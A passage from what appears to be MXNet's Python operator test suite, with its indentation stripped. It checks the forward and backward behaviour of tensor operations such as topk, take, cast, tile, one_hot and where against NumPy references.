shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
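# Illustrative sketch: gt_topk above selects top-k entries by taking the last k
# positions of an ascending argsort via np.take(..., indices=np.arange(-1, -k-1, -1),
# mode='wrap'), so the negative indices wrap around to the largest elements.  The
# helper below is hypothetical and only demonstrates that trick on a 1-D array.
def _example_topk_via_argsort():
    dat = np.array([7.0, 1.0, 5.0, 9.0])
    order = dat.argsort()                                  # ascending positions
    top2 = np.take(order, indices=np.arange(-1, -3, -1), mode='wrap')
    assert (dat[top2] == np.array([9.0, 7.0])).all()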
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
        grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape +
                           (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()),
                           dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
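    # For the affine transform the generated grid can be written as G = A @ P, where A is
    # the 2x3 affine matrix and P stacks the normalized target coordinates (x in [-1, 1],
    # y in [-1, 1], and a row of ones), so dL/dA = dL/dG @ P^T. The backward checks below
    # build P explicitly as `tmp` and compare the reported gradient against that product.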
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
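# Illustrative note (not part of the generated test data): with round-to-nearest-even,
# a float32 value exactly half-way between two float16 neighbours rounds to the
# neighbour with the even mantissa, e.g. np.float16(1.0 + 2**-11) == np.float16(1.0).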
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
if default_context().device_type == 'gpu':
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_context().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
        grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int64)  # np.int alias was removed from NumPy
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
